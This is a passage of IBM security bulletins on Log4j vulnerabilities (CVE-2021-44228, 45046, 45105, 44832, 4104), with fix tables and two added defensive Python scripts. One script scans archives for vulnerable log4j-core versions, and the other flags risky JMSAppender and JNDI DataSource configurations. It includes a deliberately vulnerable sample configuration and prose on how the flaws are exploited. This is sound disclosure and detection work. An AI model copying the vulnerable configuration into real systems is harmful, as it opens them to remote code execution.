Download the help contents zip for **_version 9.7.2 or higher_** and unzip it into the new kcci_install directory.\n\n**Additional Help**\n\nFor further information on installing IBM Engineering Requirements Management DOORS on your computer, review the following [information link](<https://www.ibm.com/docs/en/ermd/9.7.2?topic=applications-installing-help-your-computer> \"information link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T16:56:55", "type": "ibm", "title": "Security Bulletin: IBM Engineering Requirements Management DOORS is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T16:56:55", "id": "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "href": "https://www.ibm.com/support/pages/node/6540618", "cvss": {"score": 9.3, "vector": 
* * *

# Security Bulletin: API Connect is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832)

## Summary

Apache Log4j is used by API Connect as part of its logging and analytics infrastructure. The fix includes Apache Log4j 2.17.1, which addresses CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832.

## Vulnerability Details

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)  
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.  
CVSS Base score: 7.5  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)  
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  
CVSS Base score: 9  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215195> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)  
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.  
CVSS Base score: 6.6  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

## Affected Products and Versions

**Affected Product** | **Version(s)**
---|---
API Connect | V10.0.0.0 - V10.0.4.0
API Connect | V10.0.1.0 - V10.0.1.5
API Connect | V2018.4.1.0 - 2018.4.1.17
API Connect | V5.0.0.0 - 5.0.8.12

## Remediation/Fixes

**IBM strongly recommends addressing the vulnerability now by upgrading.**

**Affected Product** | **Addressed in VRMF** | **Remediation / Fix**
---|---|---
IBM API Connect V10.0.1.0 - V10.0.4.0 | V10.0.4.0-ifix1 | Addressed in IBM API Connect V10.0.4.0-ifix1. The Analytics component is impacted. Follow this link and find the appropriate package: <https://www.ibm.com/support/pages/node/6541170>
IBM API Connect V10.0.1.1 - V10.0.1.5 | V10.0.1.5-ifix4 | Addressed in IBM API Connect V10.0.1.5-ifix4. The Analytics component is impacted. Follow this link and find the appropriate package: <https://www.ibm.com/support/pages/node/6540696>
IBM API Connect V2018.4.1.0 - 2018.4.1.17 | V2018.4.1.17-ifix2 | Addressed in IBM API Connect V2018.4.1.17-ifix2. The Analytics component is impacted. Follow this link and find the appropriate package: <https://www.ibm.com/support/pages/node/6478999>
IBM API Connect V5.0.0.0 - V5.0.8.12 | V5.0.8.13 | Addressed in IBM API Connect V5.0.8.13. The Analytics and Management components are impacted. Follow this link and find the appropriate package: <https://www.ibm.com/support/pages/node/6538964>

## Workarounds and Mitigations

None

_Record: IBM software security bulletin published 2022-01-19T00:06:28 (last modified the same time; last seen 2023-05-23T17:57:46), source <https://www.ibm.com/support/pages/node/6541728>. CVE list: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105. Aggregate record scores (higher than any per-CVE score given in the bulletin itself): CVSS v3.1 10.0 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS v2 9.3 High, AV:N/AC:M/Au:N/C:C/I:C/A:C._

* * *

# Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)

## Summary

IBM Cognos Analytics is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities CVE-2021-45105 and CVE-2021-44832. IBM Cognos Analytics has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.

## Vulnerability Details

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)  
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.  
CVSS Base score: 6.6  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)  
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.  
CVSS Base score: 7.5  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

## Affected Products and Versions

IBM Cognos Analytics 11.2.x

IBM Cognos Analytics 11.1.x

IBM Cognos Analytics 11.0.6 to 11.0.13 FP4

## Remediation/Fixes

If you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update.

Two links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. Clients who have IBM Cognos Analytics by way of another product, such as IBM Planning Analytics, IBM Cognos Controller or IBM OpenPages, will access the Interim Fix via the link under Bundled Customers.

Affected Version | Fix Version | Bundled Customers
---|---|---
IBM Cognos Analytics 11.2.x | [IBM Cognos Analytics 11.2.1 Interim Fix 3](https://www.ibm.com/support/pages/node/6525670) | [IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc)
IBM Cognos Analytics 11.1.x | [IBM Cognos Analytics 11.1.7 Interim Fix 9](https://www.ibm.com/support/pages/node/6525664) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](https://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc)
IBM Cognos Analytics 11.0.6 to 11.0.13 FP4 | [IBM Cognos Analytics 11.0.13 Interim Fix 5](https://www.ibm.com/support/pages/node/6525666) | [IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc)

Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.

The required remediation will be applied during the standard monthly IBM Cognos Analytics on Cloud maintenance window on January 15, 2022.

## Workarounds and Mitigations

The IBM Cognos Analytics team has developed a “no-upgrade” option for “On Prem” (local installation) customers.

A single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x.

The log4jSafeAgent file provided for Cognos Analytics modifies class byte code at Java startup time. It removes the vulnerable JNDI lookup and enforces the StrSubstitutor recursion limit without altering the installed product. It effectively rewrites the “org/apache/logging/log4j/core/lookup/JndiLookup” class to remove its content during IBM Cognos Analytics start up. Note that, as described here, the agent targets the JNDI lookup and the lookup recursion limit, which are the mechanisms behind CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105; the bulletin does not state whether it also covers the JDBC Appender data-source path of CVE-2021-44832, so treat it as a stop-gap and still apply the Interim Fix.

To get the patch and detailed instructions, click this link: [log4jSafeAgent](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http)

Bundle customers can use the following link: [log4jSafeAgent Bundled](https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc)

_Record: IBM software security bulletin published 2022-04-20T19:28:52 (last modified the same time; last seen 2023-05-23T17:54:43), source <https://www.ibm.com/support/pages/node/6538720>. CVE list: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105. Aggregate record scores (higher than any per-CVE score given in the bulletin itself): CVSS v3.1 10.0 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS v2 9.3 High, AV:N/AC:M/Au:N/C:C/I:C/A:C._
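Both the DOORS procedure earlier on this page (replacing the contents of kcci_install by hand) and the Cognos log4jSafeAgent (which blanks the JndiLookup class at start-up) leave open the question of which log4j-core versions actually remain on disk, including inside nested archives such as KC_CI.zip. The following Python script is an added example, not IBM tooling: it walks a directory, opens every jar/war/ear/zip and the archives nested inside them, reads the log4j-core version from its Maven pom.properties, reports whether JndiLookup.class is present, and lists which of the four Log4j 2 CVEs that version is still exposed to, using the fixed-in versions from the Apache Log4j security page (2.15.0, 2.16.0, 2.17.0 and 2.17.1 on the main line, plus the 2.12.x and 2.3.x backport thresholds). A jar with no pom.properties, such as a shaded or relocated copy, is reported as exposed to everything so that it gets a manual look. The bundle built by `build_sample_bundle()` is constructed for the demo and is not real IBM content.

```python
"""Inventory scan for embedded Apache Log4j 2 (log4j-core) in archives.

Added example for this page; not IBM's tooling. Walks a directory, opens every
jar/war/ear/zip (and archives nested inside them), reads the log4j-core version
from Maven pom.properties, notes whether JndiLookup.class is still present and
lists which Log4j 2 CVEs that version is still exposed to.
"""
import io
import os
import re
import zipfile
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# First fixed release per branch: main 2.x line, Java 7 2.12.x line, Java 6 2.3.x
# line (values from the Apache Log4j security page).
FIXED_IN = {
    "CVE-2021-44228": {"2": (2, 15, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45046": {"2": (2, 16, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45105": {"2": (2, 17, 0), "2.12": (2, 12, 3), "2.3": (2, 3, 1)},
    "CVE-2021-44832": {"2": (2, 17, 1), "2.12": (2, 12, 4), "2.3": (2, 3, 2)},
}

Version = Tuple[int, int, int]


@dataclass
class Finding:
    path: str                   # outer file, then "!" before each nested archive entry
    version: Optional[str]      # None when pom.properties is absent (shaded/relocated jar)
    jndi_lookup_present: bool
    open_cves: List[str] = field(default_factory=list)


def parse_version(pom_properties: str) -> Optional[Version]:
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def open_cves_for(version: Optional[Version]) -> List[str]:
    """CVEs not yet fixed at `version`; an unknown version is treated as unfixed."""
    if version is None:
        return sorted(FIXED_IN)
    branch = "2.12" if version[:2] == (2, 12) else "2.3" if version[:2] == (2, 3) else "2"
    return [cve for cve, fixed in FIXED_IN.items() if version < fixed[branch]]


def scan_archive(label: str, data: bytes) -> List[Finding]:
    """Inspect one archive held in memory and recurse into archives nested in it."""
    findings: List[Finding] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_LOOKUP in names:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
        findings.append(Finding(
            path=label,
            version=".".join(map(str, version)) if version else None,
            jndi_lookup_present=JNDI_LOOKUP in names,
            open_cves=open_cves_for(version),
        ))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            findings.extend(scan_archive(f"{label}!{name}", zf.read(name)))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan every archive under `root` (e.g. a kcci_install directory)."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(path, fh.read()))
    return findings


def build_sample_bundle() -> bytes:
    """Constructed demo input: a KC_CI.zip-like bundle holding two stub log4j-core
    jars (2.17.0 with JndiLookup still inside, 2.17.1 without). Not real IBM content."""
    def jar(version: str, with_jndi: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # stub class bytes, never loaded
        return buf.getvalue()

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("old/log4j-core-2.17.0.jar", jar("2.17.0", True))
        z.writestr("new/log4j-core-2.17.1.jar", jar("2.17.1", False))
    return buf.getvalue()


def demo() -> List[Finding]:
    return scan_archive("KC_CI.zip", build_sample_bundle())


if __name__ == "__main__":
    import sys
    for f in (scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        state = ("OPEN: " + ", ".join(f.open_cves)) if f.open_cves else "fixed"
        jndi = "present" if f.jndi_lookup_present else "absent"
        print(f"{f.path}: log4j-core {f.version or 'unknown'} JndiLookup={jndi} {state}")
```

Run it as `python3 scan.py "C:\...\kcci_install"` (or any install tree) and treat every line that is not `fixed` as outstanding work. Note the limit of a file scan for the Cognos agent case: the agent rewrites JndiLookup in memory, so the class is still reported as present in the jar on disk; there, the version number, not the JndiLookup column, is what tells you whether the Interim Fix has been applied.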
* * *

# Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Conductor is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)

## Summary

Apache Log4j is used by IBM Spectrum Conductor for generating logs in some of its components, such as ELK, ascd and the GUI. This bulletin provides interim fixes that include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Conductor.

## Vulnerability Details

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)  
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.  
CVSS Base score: 7.5  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)  
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  
CVSS Base score: 9  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215195> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)  
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.  
CVSS Base score: 6.6  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

## Affected Products and Versions

**Affected Product(s)** | **Version(s)**
---|---
IBM Spectrum Conductor | 2.4.1
IBM Spectrum Conductor | 2.5.0
IBM Spectrum Conductor | 2.5.1

## Remediation/Fixes

**IBM strongly recommends addressing the vulnerabilities now by applying the interim fixes in the following table:**

**Products** | **VRMF** | **APAR** | **Remediation/Fix**
---|---|---|---
IBM Spectrum Conductor | 2.4.1 | P104516 | [sc-2.4.1-build600955](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0)
IBM Spectrum Conductor | 2.5.0 | P104513 | [sc-2.5-build600954](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0)
IBM Spectrum Conductor | 2.5.1 | P104512 | [sc-2.5.1-build600953](http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0)

## Workarounds and Mitigations

As detailed above in the **Remediation/Fixes** section.

_Record: IBM software security bulletin published 2022-01-19T02:42:40 (last modified the same time; last seen 2023-05-23T17:57:46), source <https://www.ibm.com/support/pages/node/6541736>. CVE list: CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105. Aggregate record scores (higher than any per-CVE score given in the bulletin itself): CVSS v3.1 10.0 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS v2 9.3 High, AV:N/AC:M/Au:N/C:C/I:C/A:C._

* * *

# Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)

## Summary

Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832). The fix addresses the vulnerabilities by removing Apache Log4j.

## Vulnerability Details

**CVEID:** [CVE-2021-4104](https://vulners.com/cve/CVE-2021-4104)  
**DESCRIPTION:** Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215048> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)  
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  
CVSS Base score: 9  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215195> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)  
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230.  
CVSS Base score: 7.5  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-44832](https://vulners.com/cve/CVE-2021-44832)  
**DESCRIPTION:** Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code.  
CVSS Base score: 6.6  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

## Affected Products and Versions

**Principal Product and Version(s)** | **Affected Supporting Product and Version(s)**
---|---
IBM Security Key Lifecycle Manager (SKLM) v2.7\* [EOS] | WebSphere Application Server v9.0.0.1
IBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5
IBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5
IBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0
IBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5
IBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6

\* IBM Security Key Lifecycle Manager (SKLM) v2.7: applicable only for customers with a support extension.

## Remediation/Fixes

Depending on your SKLM/GKLM version, see the relevant instructions:

 * SKLM 3.0, 3.0.1, and 4.0
 * GKLM 4.1
 * GKLM 4.1.1

* * *

## For SKLM 3.0, 3.0.1, 4.0

Also applicable for SKLM 2.7 (**only for customers with a support extension contract**).

**Required step: Apply WAS fix pack**  
Apply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](https://www.ibm.com/support/pages/node/6538024).

**Recommended additional step: Upgrade Java**

After you apply the WAS fix pack, it is recommended that you upgrade the IBM® SDK Java™ Technology Edition maintenance to [V8.0.6.26](https://www.ibm.com/support/pages/node/587245#80626). For instructions, see [How to upgrade IBM SDK Java Technology Edition](https://www.ibm.com/support/pages/node/6538362).

**Note:** You only need to apply the Java SDK. No other manual step is required.

* * *

## For GKLM 4.1

**Required step: Apply WAS fix pack and GKLM fix pack**

 1. Apply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](https://www.ibm.com/support/pages/node/6538024).
 2. Apply [GKLM 4.1.0 FP4](https://www.ibm.com/support/pages/node/6552274). You can download it from [Fix Central](https://www.ibm.com/support/fixcentral).

**Recommended additional step: Upgrade Java**

After you apply the WAS fix pack, it is recommended that you upgrade the IBM® SDK Java™ Technology Edition maintenance to [V8.0.6.26](https://www.ibm.com/support/pages/node/587245#80626). For instructions, see [How to upgrade IBM SDK Java Technology Edition](https://www.ibm.com/support/pages/node/6538362).

**Note:** You only need to apply the Java SDK. No other manual step is required.

* * *

## For GKLM 4.1.1

The issues are fixed in [GKLM 4.1.1 - Fix Pack 3](https://www.ibm.com/support/pages/node/6529054). You can download it from [Fix Central](https://www.ibm.com/support/fixcentral).

## Workarounds and Mitigations

None

_Record: IBM software security bulletin published 2022-05-04T12:55:51 (last modified the same time; last seen 2023-05-23T17:53:58), source <https://www.ibm.com/support/pages/node/6539408>. CVE list: CVE-2021-4104, CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105. Aggregate record scores (higher than any per-CVE score given in the bulletin itself): CVSS v3.1 10.0 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS v2 9.3 High, AV:N/AC:M/Au:N/C:C/I:C/A:C._
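CVE-2021-4104 and CVE-2021-44832 in this bulletin share a precondition the other Log4j CVEs do not: the attacker must already be able to write the logging configuration, and that configuration must wire in a JMSAppender (Log4j 1.x) or a JDBC Appender whose DataSource is resolved through JNDI (Log4j 2). The following Python script is an added example, not IBM code: it checks configuration files for those two shapes, flags a Log4j 2 DataSource `jndiName` that does not start with `java:` (the only protocol Log4j 2.17.1 itself accepts there), and reports configuration files writable by group or others, since write access is the attacker's entry point. It parses XML and properties formats only (Log4j 2 JSON and YAML configurations are not covered). The sample configurations are constructed for the demo; `example.invalid` is a reserved placeholder host.

```python
"""Flag Log4j configurations that meet the preconditions of CVE-2021-4104
(Log4j 1.x JMSAppender) and CVE-2021-44832 (Log4j 2 JDBC Appender whose
DataSource is resolved through a non-java: JNDI name).

Added example, not IBM's code. Both CVEs require write access to the
configuration, so check_file() also reports configs writable by group/others.
"""
import os
import stat
import xml.etree.ElementTree as ET
from typing import Dict, List

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"


def _jndi_issue(jndi_name: str, where: str) -> str:
    return f"CVE-2021-44832 precondition: DataSource jndiName {jndi_name!r} at {where} is not a java: name"


def check_xml(text: str) -> List[str]:
    """Log4j 1.x DOM config (<appender class=...>) and Log4j 2 XML config
    (<JDBC><DataSource jndiName=.../></JDBC>)."""
    issues: List[str] = []
    root = ET.fromstring(text)
    for el in root.iter("appender"):
        if el.get("class") == JMS_APPENDER:
            issues.append(f"CVE-2021-4104 precondition: JMSAppender {el.get('name')!r} configured")
    for el in root.iter():
        jndi_name = el.get("jndiName")
        if el.tag.lower() == "datasource" and jndi_name is not None and not jndi_name.lower().startswith("java:"):
            issues.append(_jndi_issue(jndi_name, f"<{el.tag}>"))
    return issues


def check_properties(text: str) -> List[str]:
    """Log4j 1.x properties (log4j.appender.X=...JMSAppender) and Log4j 2
    properties format (appender.X.dataSource.jndiName=...)."""
    issues: List[str] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if value == JMS_APPENDER:
            issues.append(f"CVE-2021-4104 precondition: {key} configures a JMSAppender")
        if key.lower().endswith("jndiname") and not value.lower().startswith("java:"):
            issues.append(_jndi_issue(value, key))
    return issues


def check_file(path: str) -> List[str]:
    """Permission check plus the content check for one configuration file on disk."""
    issues: List[str] = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append(f"{path} is writable by group/other (mode {oct(stat.S_IMODE(mode))}); "
                      "config write access is the attacker precondition for both CVEs")
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    checker = check_xml if path.lower().endswith(".xml") else check_properties
    return issues + checker(text)


# Constructed sample configurations for the demo (not taken from any IBM product).
SAMPLE_LOG4J1_PROPERTIES = """\
log4j.rootLogger=INFO, jms
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=logTopic
"""

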